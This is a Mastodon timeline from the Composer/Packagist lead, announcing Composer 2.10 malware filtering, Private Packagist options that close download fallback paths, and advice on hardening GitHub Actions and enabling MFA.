Jordi Boggiano

@seldaek
1.3K Followers
106 Following
70 Posts
Co-Founder of @packagist โ€“ Dev at teamup.com โ€“ #ComposerPHP lead โ€“ Wandering Belgian
Websitehttps://seld.be
GitHubhttps://github.com/Seldaek
Jordi Boggiano3h ago
packagist4h ago
๐Ÿ›ก๏ธ Blog: How Composer's download fallback behavior can silently override security decisions at the repository side, and what we are doing about it.
If Private Packagist refuses to serve a malware-flagged version, Composer can fall back to the original GitHub URL, or even clone from source. Two new Private Packagist options close both fallback paths, regardless of the Composer version your developers and CI happen to be running.
https://blog.packagist.com/closing-composers-download-fallback-paths-in-private-packagist/
#php #phpc #composerphp
Closing Composer's Download Fallback Paths in Private Packagist

This is the next post in our supply chain security series, following the supply chain security update and the Composer 2.10 release. Each post in this series covers a specific Composer behavior worth understanding, and a Private Packagist feature we are introducing on top of it. Today: How Composer's

Private Packagist
Jordi Boggiano3d ago

RE: https://phpc.social/@packagist/116607210878071413

I realized I was never going to get to adding zizmor to all my repos so I made a claude skill to let it do the grunt work.

You can use it too, if it helps more busy/lazy people to secure their GitHub repos I am glad!

See https://github.com/Seldaek/zizmorify

Jordi Boggiano4d ago

๐Ÿ“ฆ Composer 2.10 is out today.

Native malware filtering, powered by an Aikido feed and enabled by default for everyone installing from Packagist. The new unified config.policy framework consolidates handling of malware, security advisories, and abandoned packages, and also lets organizations plug in their own custom policies.
Source fallback is now deprecated, and there's wildcard support in composer update --with.

https://blog.packagist.com/composer-2-10-release/

#php #phpc #composerphp

Composer 2.10 Release

We are excited to announce the release of Composer 2.10.0, introducing native malware filtering and consolidated future-proof customizable dependency policy configuration to control the handling of security advisories, abandoned packages, and now malware. Fast detection of malware for packages published on Packagist.org is provided by Aikido. This

Private Packagist
Jordi Boggiano4d ago
packagist4d ago

๐Ÿ”’ An update on Composer & Packagist supply chain security:

Covering what's in place today, what ships this week with Composer 2.10 (dependency policies, stable version immutability), what's coming next (mandatory MFA, minimum-release-age policy, organizational package ownership), and the long-term direction toward immutable artifacts with SLSA provenance and sigstore attestations.

If you maintain PHP packages, please enable MFA now.

https://blog.packagist.com/an-update-on-composer-packagist-supply-chain-security/
#php #phpc #composerphp

An Update on Composer & Packagist Supply Chain Security

The last months, and even more so the last weeks, saw an increasing amount of software supply chain attacks targeting open-source ecosystems. A handful of these have hit the PHP ecosystem too, via taken-over GitHub accounts and stolen access tokens that let attackers publish new tags on packages they had

Private Packagist
Jordi BoggianoMay 20
Show threadpackagistMay 20
We recommend you change the default permissions for GitHub Actions GITHUB_TOKENs to read only. Explicitly grant elevated permissions only where strictly necessary. Use zizmor to analyze your GitHub Actions: https://github.com/zizmorcore/zizmor see also @sebastian on zizmor: https://phpunit.expert/articles/hardening-github-actions-workflows.html
Jordi BoggianoMay 20
It took us a bit longer than expected but after over a month of discussions and rewrites, Composer 2.10 RC2 is now available for testing with a new policy config and detected malware now blocked by default on install. https://github.com/composer/composer/releases/tag/2.10.0-RC2 #composerphp #phpc
Release 2.10.0-RC2 ยท composer/composer

Composer 2.10 is ready for a release, and we need your help to test it and report any regression. Please try it out! Running composer self-update --preview will get you the 2.10.0-RC2 Running comp...

GitHub
Jordi BoggianoMay 20
packagistMay 20

RE: https://phpc.social/@packagist/116566852406125489

If you haven't updated Composer to 2.9.8 or 2.2.28 (LTS), do so urgently! GitHub will restart the rollout of their new GitHub Actions tokens later today. They've improved secret masking to cover this Composer issue, but you're safer if you update. #composerphp #php #phpc

Jordi BoggianoMay 18
packagistMay 18

Three months of Private Packagist updates: Malware filter list support is already in place, ahead of Composer 2.10's release next week. Flagged versions show warning banners on package pages and are marked in the version list. Permissions views on package level, better background job & sync visibility, and a narrower GitLab OAuth scope (read_api).

https://blog.packagist.com/whats-new-in-private-packagist-may-2026-update/

#php #phpc #composerphp

What's New in Private Packagist, May 2026 Update

Over the past three months, we've shipped updates focused on security, integrations with code hosting platforms, and usability improvements throughout Private Packagist. Here's a rundown of the most notable changes. Support for Malware Filter Lists We've added support for malware filter lists to help protect your projects from compromised dependencies.

Private Packagist
Jordi BoggianoMay 18
Spring has come and this year's trend for my new fellow cyclists seems to be riding with airpods in their ears. Even saw a pro who combined it with looking at his phone riding hands free ๐Ÿ™ˆ
Jordi BoggianoMay 17
Sebastian Bergmann May 17

Your CI workflows run with secrets, network access, and write permission to your repo. They are code, and they deserve the same scrutiny as your other code.

@seldaek pointed me at zizmor which it found 52 weaknesses in PHPUnit's workflows. I fixed them all and wrote about each class:

https://phpunit.expert/articles/hardening-github-actions-workflows.html?ref=mastodon

Hardening GitHub Actions workflows

A walk through the GitHub Actions weaknesses in PHPUnit's workflows, how each one could have been exploited, and what was changed to close them.

phpunit.expert